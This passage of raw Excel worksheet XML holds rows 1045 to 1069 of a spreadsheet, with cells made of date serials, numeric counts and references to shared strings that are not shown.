      <c r="B1045" s="52">
        <v>44008.481357233795</v>
      </c>
      <c r="C1045" s="95" t="s">
        <v>3296</v>
      </c>
      <c r="D1045" s="96">
        <v>111</v>
      </c>
      <c r="E1045" s="95" t="s">
        <v>3300</v>
      </c>
      <c r="F1045" s="42">
        <v>201</v>
      </c>
      <c r="G1045" s="95" t="s">
        <v>3301</v>
      </c>
      <c r="H1045" t="s">
        <v>2299</v>
      </c>
      <c r="I1045" t="s">
        <v>203</v>
      </c>
      <c r="J1045" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K1045" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L1045" t="s">
        <v>83</v>
      </c>
      <c r="M1045" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P1045" t="s">
        <v>1824</v>
      </c>
      <c r="Q1045" s="95" t="s">
        <v>3102</v>
      </c>
      <c r="R1045">
        <v>1</v>
      </c>
      <c r="S1045">
        <v>1</v>
      </c>
      <c r="T1045">
        <v>2</v>
      </c>
      <c r="U1045">
        <v>2</v>
      </c>
      <c r="V1045">
        <v>5</v>
      </c>
      <c r="W1045" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1046" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1046" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1046" s="52">
        <v>43847.510102187502</v>
      </c>
      <c r="C1046" s="95" t="s">
        <v>3175</v>
      </c>
      <c r="D1046" s="96">
        <v>151</v>
      </c>
      <c r="E1046" s="95" t="s">
        <v>3302</v>
      </c>
      <c r="F1046" s="42">
        <v>101</v>
      </c>
      <c r="G1046" s="95" t="s">
        <v>3303</v>
      </c>
      <c r="H1046" t="s">
        <v>2358</v>
      </c>
      <c r="I1046" t="s">
        <v>179</v>
      </c>
      <c r="J1046" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K1046" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1046" t="s">
        <v>77</v>
      </c>
      <c r="O1046" s="95" t="s">
        <v>2359</v>
      </c>
      <c r="P1046" t="s">
        <v>181</v>
      </c>
      <c r="Q1046" s="95" t="s">
        <v>3178</v>
      </c>
      <c r="R1046">
        <v>298</v>
      </c>
      <c r="S1046">
        <v>200</v>
      </c>
      <c r="T1046">
        <v>1421</v>
      </c>
      <c r="U1046">
        <v>2520</v>
      </c>
      <c r="V1046">
        <v>2383</v>
      </c>
      <c r="W1046" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1047" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1047" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1047" s="52">
        <v>43762.390177233799</v>
      </c>
      <c r="C1047" s="95" t="s">
        <v>3175</v>
      </c>
      <c r="D1047" s="96">
        <v>151</v>
      </c>
      <c r="E1047" s="95" t="s">
        <v>3304</v>
      </c>
      <c r="F1047" s="42">
        <v>100</v>
      </c>
      <c r="G1047" s="95" t="s">
        <v>3305</v>
      </c>
      <c r="H1047" t="s">
        <v>3306</v>
      </c>
      <c r="I1047" t="s">
        <v>179</v>
      </c>
      <c r="J1047" s="95" t="s">
        <v>180</v>
      </c>
      <c r="K1047" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1047" t="s">
        <v>77</v>
      </c>
      <c r="O1047" s="95" t="s">
        <v>3307</v>
      </c>
      <c r="P1047" t="s">
        <v>920</v>
      </c>
      <c r="Q1047" s="95" t="s">
        <v>3178</v>
      </c>
      <c r="W1047" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1048" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1048" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1048" s="52">
        <v>44082.361591064815</v>
      </c>
      <c r="C1048" s="95" t="s">
        <v>2378</v>
      </c>
      <c r="D1048" s="96">
        <v>100</v>
      </c>
      <c r="E1048" s="95" t="s">
        <v>3308</v>
      </c>
      <c r="F1048" s="42">
        <v>100</v>
      </c>
      <c r="G1048" s="95" t="s">
        <v>3309</v>
      </c>
      <c r="H1048" t="s">
        <v>3310</v>
      </c>
      <c r="I1048" t="s">
        <v>31</v>
      </c>
      <c r="J1048" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1048" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1048" t="s">
        <v>77</v>
      </c>
      <c r="M1048" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1048" t="s">
        <v>263</v>
      </c>
      <c r="Q1048" s="95" t="s">
        <v>1421</v>
      </c>
      <c r="W1048" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1049" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1049" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1049" s="52">
        <v>44082.36159104167</v>
      </c>
      <c r="C1049" s="95" t="s">
        <v>2378</v>
      </c>
      <c r="D1049" s="96">
        <v>100</v>
      </c>
      <c r="E1049" s="95" t="s">
        <v>3311</v>
      </c>
      <c r="F1049" s="42">
        <v>100</v>
      </c>
      <c r="G1049" s="95" t="s">
        <v>3312</v>
      </c>
      <c r="H1049" t="s">
        <v>2377</v>
      </c>
      <c r="I1049" t="s">
        <v>31</v>
      </c>
      <c r="J1049" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1049" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1049" t="s">
        <v>77</v>
      </c>
      <c r="M1049" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1049" t="s">
        <v>263</v>
      </c>
      <c r="Q1049" s="95" t="s">
        <v>1421</v>
      </c>
      <c r="W1049" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1050" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1050" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1050" s="52">
        <v>43942.496504606483</v>
      </c>
      <c r="C1050" s="95" t="s">
        <v>3313</v>
      </c>
      <c r="D1050" s="96">
        <v>101</v>
      </c>
      <c r="E1050" s="95" t="s">
        <v>3314</v>
      </c>
      <c r="F1050" s="42">
        <v>101</v>
      </c>
      <c r="G1050" s="95" t="s">
        <v>3315</v>
      </c>
      <c r="H1050" t="s">
        <v>3316</v>
      </c>
      <c r="I1050" t="s">
        <v>179</v>
      </c>
      <c r="J1050" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="K1050" s="95" t="s">
        <v>23</v>
      </c>
      <c r="L1050" t="s">
        <v>77</v>
      </c>
      <c r="M1050" s="95" t="s">
        <v>1006</v>
      </c>
      <c r="N1050" t="s">
        <v>1007</v>
      </c>
      <c r="O1050" s="95" t="s">
        <v>3317</v>
      </c>
      <c r="Q1050" s="95" t="s">
        <v>151</v>
      </c>
      <c r="R1050">
        <v>11</v>
      </c>
      <c r="S1050">
        <v>3</v>
      </c>
      <c r="T1050">
        <v>39</v>
      </c>
      <c r="U1050">
        <v>641</v>
      </c>
      <c r="V1050">
        <v>2819</v>
      </c>
      <c r="W1050" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1051" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1051" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1051" s="52">
        <v>44021.851558125003</v>
      </c>
      <c r="C1051" s="95" t="s">
        <v>3318</v>
      </c>
      <c r="D1051" s="96">
        <v>101</v>
      </c>
      <c r="E1051" s="95" t="s">
        <v>3319</v>
      </c>
      <c r="F1051" s="42">
        <v>101</v>
      </c>
      <c r="G1051" s="95" t="s">
        <v>3320</v>
      </c>
      <c r="H1051" t="s">
        <v>2592</v>
      </c>
      <c r="I1051" t="s">
        <v>185</v>
      </c>
      <c r="J1051" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1051" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1051" t="s">
        <v>83</v>
      </c>
      <c r="M1051" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1051" s="95" t="s">
        <v>2593</v>
      </c>
      <c r="P1051" t="s">
        <v>677</v>
      </c>
      <c r="Q1051" s="95" t="s">
        <v>3321</v>
      </c>
      <c r="R1051">
        <v>8234</v>
      </c>
      <c r="S1051">
        <v>6256</v>
      </c>
      <c r="T1051">
        <v>49340</v>
      </c>
      <c r="U1051">
        <v>73062</v>
      </c>
      <c r="V1051">
        <v>85331</v>
      </c>
      <c r="W1051" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1052" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1052" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1052" s="52">
        <v>43748.941609791669</v>
      </c>
      <c r="C1052" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1052" s="96">
        <v>173</v>
      </c>
      <c r="E1052" s="95" t="s">
        <v>3322</v>
      </c>
      <c r="F1052" s="42">
        <v>130</v>
      </c>
      <c r="G1052" s="95" t="s">
        <v>3323</v>
      </c>
      <c r="H1052" t="s">
        <v>3324</v>
      </c>
      <c r="I1052" t="s">
        <v>268</v>
      </c>
      <c r="J1052" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1052" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1052" t="s">
        <v>77</v>
      </c>
      <c r="N1052" t="s">
        <v>3208</v>
      </c>
      <c r="Q1052" s="95" t="s">
        <v>3202</v>
      </c>
      <c r="W1052" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1053" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1053" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1053" s="52">
        <v>44140.032963622682</v>
      </c>
      <c r="C1053" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1053" s="96">
        <v>206</v>
      </c>
      <c r="E1053" s="95" t="s">
        <v>3322</v>
      </c>
      <c r="F1053" s="42">
        <v>132</v>
      </c>
      <c r="G1053" s="95" t="s">
        <v>3323</v>
      </c>
      <c r="H1053" t="s">
        <v>3324</v>
      </c>
      <c r="I1053" t="s">
        <v>268</v>
      </c>
      <c r="J1053" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1053" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1053" t="s">
        <v>77</v>
      </c>
      <c r="N1053" t="s">
        <v>3208</v>
      </c>
      <c r="O1053" s="95" t="s">
        <v>3325</v>
      </c>
      <c r="Q1053" s="95" t="s">
        <v>3203</v>
      </c>
      <c r="R1053">
        <v>23103</v>
      </c>
      <c r="S1053">
        <v>12603</v>
      </c>
      <c r="T1053">
        <v>80018</v>
      </c>
      <c r="U1053">
        <v>151727</v>
      </c>
      <c r="V1053">
        <v>174106</v>
      </c>
      <c r="W1053" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1054" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1054" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1054" s="52">
        <v>43748.941609780093</v>
      </c>
      <c r="C1054" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1054" s="96">
        <v>173</v>
      </c>
      <c r="E1054" s="95" t="s">
        <v>3326</v>
      </c>
      <c r="F1054" s="42">
        <v>120</v>
      </c>
      <c r="G1054" s="95" t="s">
        <v>3327</v>
      </c>
      <c r="H1054" t="s">
        <v>1074</v>
      </c>
      <c r="I1054" t="s">
        <v>268</v>
      </c>
      <c r="J1054" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1054" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1054" t="s">
        <v>77</v>
      </c>
      <c r="N1054" t="s">
        <v>3208</v>
      </c>
      <c r="Q1054" s="95" t="s">
        <v>3202</v>
      </c>
      <c r="W1054" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1055" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1055" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1055" s="52">
        <v>43748.941609780093</v>
      </c>
      <c r="C1055" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1055" s="96">
        <v>206</v>
      </c>
      <c r="E1055" s="95" t="s">
        <v>3326</v>
      </c>
      <c r="F1055" s="42">
        <v>120</v>
      </c>
      <c r="G1055" s="95" t="s">
        <v>3327</v>
      </c>
      <c r="H1055" t="s">
        <v>3328</v>
      </c>
      <c r="I1055" t="s">
        <v>268</v>
      </c>
      <c r="J1055" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1055" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L1055" t="s">
        <v>77</v>
      </c>
      <c r="N1055" t="s">
        <v>3208</v>
      </c>
      <c r="O1055" s="95" t="s">
        <v>2973</v>
      </c>
      <c r="Q1055" s="95" t="s">
        <v>3203</v>
      </c>
      <c r="W1055" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1056" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1056" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1056" s="52">
        <v>43872.595933576391</v>
      </c>
      <c r="C1056" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1056" s="96">
        <v>173</v>
      </c>
      <c r="E1056" s="95" t="s">
        <v>3329</v>
      </c>
      <c r="F1056" s="42">
        <v>143</v>
      </c>
      <c r="G1056" s="95" t="s">
        <v>3330</v>
      </c>
      <c r="H1056" t="s">
        <v>3045</v>
      </c>
      <c r="I1056" t="s">
        <v>268</v>
      </c>
      <c r="J1056" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1056" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1056" t="s">
        <v>77</v>
      </c>
      <c r="M1056" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1056" t="s">
        <v>291</v>
      </c>
      <c r="Q1056" s="95" t="s">
        <v>3202</v>
      </c>
      <c r="R1056">
        <v>6</v>
      </c>
      <c r="S1056">
        <v>9</v>
      </c>
      <c r="T1056">
        <v>64</v>
      </c>
      <c r="U1056">
        <v>710</v>
      </c>
      <c r="V1056">
        <v>383</v>
      </c>
      <c r="W1056" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1057" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1057" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1057" s="52">
        <v>44109.56779202546</v>
      </c>
      <c r="C1057" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1057" s="96">
        <v>206</v>
      </c>
      <c r="E1057" s="95" t="s">
        <v>3329</v>
      </c>
      <c r="F1057" s="42">
        <v>204</v>
      </c>
      <c r="G1057" s="95" t="s">
        <v>3330</v>
      </c>
      <c r="H1057" t="s">
        <v>3045</v>
      </c>
      <c r="I1057" t="s">
        <v>268</v>
      </c>
      <c r="J1057" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1057" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1057" t="s">
        <v>77</v>
      </c>
      <c r="M1057" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1057" t="s">
        <v>291</v>
      </c>
      <c r="P1057" t="s">
        <v>250</v>
      </c>
      <c r="Q1057" s="95" t="s">
        <v>3203</v>
      </c>
      <c r="R1057">
        <v>1075</v>
      </c>
      <c r="S1057">
        <v>668</v>
      </c>
      <c r="T1057">
        <v>8073</v>
      </c>
      <c r="U1057">
        <v>563366</v>
      </c>
      <c r="V1057">
        <v>320165</v>
      </c>
      <c r="W1057" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1058" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1058" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1058" s="52">
        <v>43838.913499305556</v>
      </c>
      <c r="C1058" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1058" s="96">
        <v>173</v>
      </c>
      <c r="E1058" s="95" t="s">
        <v>3331</v>
      </c>
      <c r="F1058" s="42">
        <v>101</v>
      </c>
      <c r="G1058" s="95" t="s">
        <v>3332</v>
      </c>
      <c r="H1058" t="s">
        <v>1074</v>
      </c>
      <c r="I1058" t="s">
        <v>268</v>
      </c>
      <c r="J1058" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1058" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1058" t="s">
        <v>77</v>
      </c>
      <c r="M1058" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1058" t="s">
        <v>291</v>
      </c>
      <c r="O1058" s="95" t="s">
        <v>2973</v>
      </c>
      <c r="Q1058" s="95" t="s">
        <v>3202</v>
      </c>
      <c r="R1058">
        <v>9327</v>
      </c>
      <c r="S1058">
        <v>1034</v>
      </c>
      <c r="T1058">
        <v>677</v>
      </c>
      <c r="U1058">
        <v>1463</v>
      </c>
      <c r="V1058">
        <v>3350</v>
      </c>
      <c r="W1058" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1059" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1059" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1059" s="52">
        <v>44109.567792048612</v>
      </c>
      <c r="C1059" s="95" t="s">
        <v>3199</v>
      </c>
      <c r="D1059" s="96">
        <v>206</v>
      </c>
      <c r="E1059" s="95" t="s">
        <v>3331</v>
      </c>
      <c r="F1059" s="42">
        <v>104</v>
      </c>
      <c r="G1059" s="95" t="s">
        <v>3332</v>
      </c>
      <c r="H1059" t="s">
        <v>3333</v>
      </c>
      <c r="I1059" t="s">
        <v>268</v>
      </c>
      <c r="J1059" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1059" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1059" t="s">
        <v>77</v>
      </c>
      <c r="M1059" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1059" t="s">
        <v>291</v>
      </c>
      <c r="O1059" s="95" t="s">
        <v>2973</v>
      </c>
      <c r="P1059" t="s">
        <v>250</v>
      </c>
      <c r="Q1059" s="95" t="s">
        <v>3203</v>
      </c>
      <c r="R1059">
        <v>12</v>
      </c>
      <c r="S1059">
        <v>18</v>
      </c>
      <c r="T1059">
        <v>38</v>
      </c>
      <c r="W1059" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1060" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1060" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1060" s="52">
        <v>43908.846880520832</v>
      </c>
      <c r="C1060" s="95" t="s">
        <v>3334</v>
      </c>
      <c r="D1060" s="96">
        <v>120</v>
      </c>
      <c r="E1060" s="95" t="s">
        <v>3335</v>
      </c>
      <c r="F1060" s="42">
        <v>101</v>
      </c>
      <c r="G1060" s="95" t="s">
        <v>3336</v>
      </c>
      <c r="H1060" t="s">
        <v>3337</v>
      </c>
      <c r="I1060" t="s">
        <v>103</v>
      </c>
      <c r="J1060" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K1060" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L1060" t="s">
        <v>77</v>
      </c>
      <c r="M1060" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P1060" t="s">
        <v>2748</v>
      </c>
      <c r="Q1060" s="95" t="s">
        <v>3338</v>
      </c>
      <c r="R1060">
        <v>73</v>
      </c>
      <c r="S1060">
        <v>50</v>
      </c>
      <c r="T1060">
        <v>1231</v>
      </c>
      <c r="U1060">
        <v>2055</v>
      </c>
      <c r="V1060">
        <v>2867</v>
      </c>
      <c r="W1060" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1061" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1061" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1061" s="52">
        <v>44019.153889895832</v>
      </c>
      <c r="C1061" s="95" t="s">
        <v>3339</v>
      </c>
      <c r="D1061" s="96">
        <v>202</v>
      </c>
      <c r="E1061" s="95" t="s">
        <v>3340</v>
      </c>
      <c r="F1061" s="42">
        <v>202</v>
      </c>
      <c r="G1061" s="95" t="s">
        <v>3341</v>
      </c>
      <c r="H1061" t="s">
        <v>2968</v>
      </c>
      <c r="I1061" t="s">
        <v>268</v>
      </c>
      <c r="J1061" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1061" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1061" t="s">
        <v>77</v>
      </c>
      <c r="M1061" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N1061" t="s">
        <v>291</v>
      </c>
      <c r="O1061" s="95" t="s">
        <v>2969</v>
      </c>
      <c r="P1061" t="s">
        <v>250</v>
      </c>
      <c r="Q1061" s="95" t="s">
        <v>3342</v>
      </c>
      <c r="R1061">
        <v>211143</v>
      </c>
      <c r="S1061">
        <v>146619</v>
      </c>
      <c r="T1061">
        <v>959799</v>
      </c>
      <c r="U1061">
        <v>1784964</v>
      </c>
      <c r="V1061">
        <v>1886227</v>
      </c>
      <c r="W1061" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1062" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1062" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1062" s="52">
        <v>43811.90038146991</v>
      </c>
      <c r="C1062" s="95" t="s">
        <v>3343</v>
      </c>
      <c r="D1062" s="96">
        <v>100</v>
      </c>
      <c r="E1062" s="95" t="s">
        <v>3344</v>
      </c>
      <c r="F1062" s="42">
        <v>100</v>
      </c>
      <c r="G1062" s="95" t="s">
        <v>3345</v>
      </c>
      <c r="H1062" t="s">
        <v>3346</v>
      </c>
      <c r="I1062" t="s">
        <v>185</v>
      </c>
      <c r="J1062" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1062" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1062" t="s">
        <v>83</v>
      </c>
      <c r="M1062" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1062" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="Q1062" s="95" t="s">
        <v>3347</v>
      </c>
      <c r="R1062">
        <v>26</v>
      </c>
      <c r="S1062">
        <v>21</v>
      </c>
      <c r="T1062">
        <v>137</v>
      </c>
      <c r="U1062">
        <v>209</v>
      </c>
      <c r="V1062">
        <v>201</v>
      </c>
      <c r="W1062" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1063" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1063" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1063" s="52">
        <v>44047.508589282406</v>
      </c>
      <c r="C1063" s="95" t="s">
        <v>3343</v>
      </c>
      <c r="D1063" s="96">
        <v>210</v>
      </c>
      <c r="E1063" s="95" t="s">
        <v>3344</v>
      </c>
      <c r="F1063" s="42">
        <v>210</v>
      </c>
      <c r="G1063" s="95" t="s">
        <v>3345</v>
      </c>
      <c r="H1063" t="s">
        <v>3346</v>
      </c>
      <c r="I1063" t="s">
        <v>185</v>
      </c>
      <c r="J1063" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1063" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1063" t="s">
        <v>83</v>
      </c>
      <c r="M1063" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1063" s="95" t="s">
        <v>2601</v>
      </c>
      <c r="P1063" t="s">
        <v>1795</v>
      </c>
      <c r="Q1063" s="95" t="s">
        <v>3107</v>
      </c>
      <c r="R1063">
        <v>22100</v>
      </c>
      <c r="S1063">
        <v>16165</v>
      </c>
      <c r="T1063">
        <v>103856</v>
      </c>
      <c r="U1063">
        <v>156387</v>
      </c>
      <c r="V1063">
        <v>181976</v>
      </c>
      <c r="W1063" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1064" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1064" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1064" s="52">
        <v>44098.935999849535</v>
      </c>
      <c r="C1064" s="95" t="s">
        <v>3348</v>
      </c>
      <c r="D1064" s="96">
        <v>102</v>
      </c>
      <c r="E1064" s="95" t="s">
        <v>3349</v>
      </c>
      <c r="F1064" s="42">
        <v>102</v>
      </c>
      <c r="G1064" s="95" t="s">
        <v>3350</v>
      </c>
      <c r="H1064" t="s">
        <v>3351</v>
      </c>
      <c r="I1064" t="s">
        <v>268</v>
      </c>
      <c r="J1064" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1064" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1064" t="s">
        <v>77</v>
      </c>
      <c r="M1064" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N1064" t="s">
        <v>1767</v>
      </c>
      <c r="P1064" t="s">
        <v>604</v>
      </c>
      <c r="Q1064" s="95" t="s">
        <v>3352</v>
      </c>
      <c r="W1064" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="1065" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1065" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1065" s="52">
        <v>44098.935999849535</v>
      </c>
      <c r="C1065" s="95" t="s">
        <v>3348</v>
      </c>
      <c r="D1065" s="96">
        <v>200</v>
      </c>
      <c r="E1065" s="95" t="s">
        <v>3349</v>
      </c>
      <c r="F1065" s="42">
        <v>200</v>
      </c>
      <c r="G1065" s="95" t="s">
        <v>3350</v>
      </c>
      <c r="H1065" t="s">
        <v>3351</v>
      </c>
      <c r="I1065" t="s">
        <v>268</v>
      </c>
      <c r="J1065" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1065" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1065" t="s">
        <v>77</v>
      </c>
      <c r="M1065" s="95" t="s">
        <v>1766</v>
      </c>
      <c r="N1065" t="s">
        <v>1767</v>
      </c>
      <c r="P1065" t="s">
        <v>604</v>
      </c>
      <c r="Q1065" s="95" t="s">
        <v>3353</v>
      </c>
      <c r="R1065">
        <v>11043</v>
      </c>
      <c r="S1065">
        <v>10795</v>
      </c>
      <c r="W1065" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="1066" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1066" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1066" s="52">
        <v>44426.747029513892</v>
      </c>
      <c r="C1066" s="95" t="s">
        <v>3354</v>
      </c>
      <c r="D1066" s="96">
        <v>112</v>
      </c>
      <c r="E1066" s="95" t="s">
        <v>3355</v>
      </c>
      <c r="F1066" s="42">
        <v>112</v>
      </c>
      <c r="G1066" s="95" t="s">
        <v>3356</v>
      </c>
      <c r="H1066" t="s">
        <v>3357</v>
      </c>
      <c r="I1066" t="s">
        <v>268</v>
      </c>
      <c r="J1066" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1066" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1066" t="s">
        <v>77</v>
      </c>
      <c r="M1066" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N1066" t="s">
        <v>271</v>
      </c>
      <c r="Q1066" s="95" t="s">
        <v>3358</v>
      </c>
      <c r="T1066">
        <v>11</v>
      </c>
      <c r="U1066">
        <v>5</v>
      </c>
      <c r="V1066">
        <v>74</v>
      </c>
      <c r="W1066" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1067" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1067" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1067" s="52">
        <v>44669.59422334491</v>
      </c>
      <c r="C1067" s="95" t="s">
        <v>3359</v>
      </c>
      <c r="D1067" s="96">
        <v>111</v>
      </c>
      <c r="E1067" s="95" t="s">
        <v>3360</v>
      </c>
      <c r="F1067" s="42">
        <v>100</v>
      </c>
      <c r="G1067" s="95" t="s">
        <v>3361</v>
      </c>
      <c r="H1067" t="s">
        <v>3362</v>
      </c>
      <c r="I1067" t="s">
        <v>268</v>
      </c>
      <c r="J1067" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1067" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1067" t="s">
        <v>77</v>
      </c>
      <c r="M1067" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N1067" t="s">
        <v>271</v>
      </c>
      <c r="Q1067" s="95" t="s">
        <v>3363</v>
      </c>
      <c r="W1067" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1068" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1068" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1068" s="52">
        <v>44536.916149328703</v>
      </c>
      <c r="C1068" s="95" t="s">
        <v>3359</v>
      </c>
      <c r="D1068" s="96">
        <v>111</v>
      </c>
      <c r="E1068" s="95" t="s">
        <v>3364</v>
      </c>
      <c r="F1068" s="42">
        <v>111</v>
      </c>
      <c r="G1068" s="95" t="s">
        <v>3365</v>
      </c>
      <c r="H1068" t="s">
        <v>3366</v>
      </c>
      <c r="I1068" t="s">
        <v>268</v>
      </c>
      <c r="J1068" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K1068" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L1068" t="s">
        <v>77</v>
      </c>
      <c r="M1068" s="95" t="s">
        <v>270</v>
      </c>
      <c r="N1068" t="s">
        <v>271</v>
      </c>
      <c r="Q1068" s="95" t="s">
        <v>3363</v>
      </c>
      <c r="S1068">
        <v>44</v>
      </c>
      <c r="V1068">
        <v>24</v>
      </c>
      <c r="W1068" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="1069" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1069" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B1069" s="52">
        <v>44082.689054016206</v>
      </c>
      <c r="C1069" s="95" t="s">
        <v>3367</v>
      </c>
      <c r="D1069" s="96">
        <v>101</v>
      </c>
      <c r="E1069" s="95" t="s">
        <v>3368</v>
      </c>
      <c r="F1069" s="42">
        <v>101</v>
      </c>
      <c r="G1069" s="95" t="s">
        <v>3369</v>
      </c>
      <c r="H1069" t="s">
        <v>3346</v>
      </c>
      <c r="I1069" t="s">
        <v>185</v>
      </c>
      <c r="J1069" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1069" s="95" t="s">
        <v>16</v>
      </c>
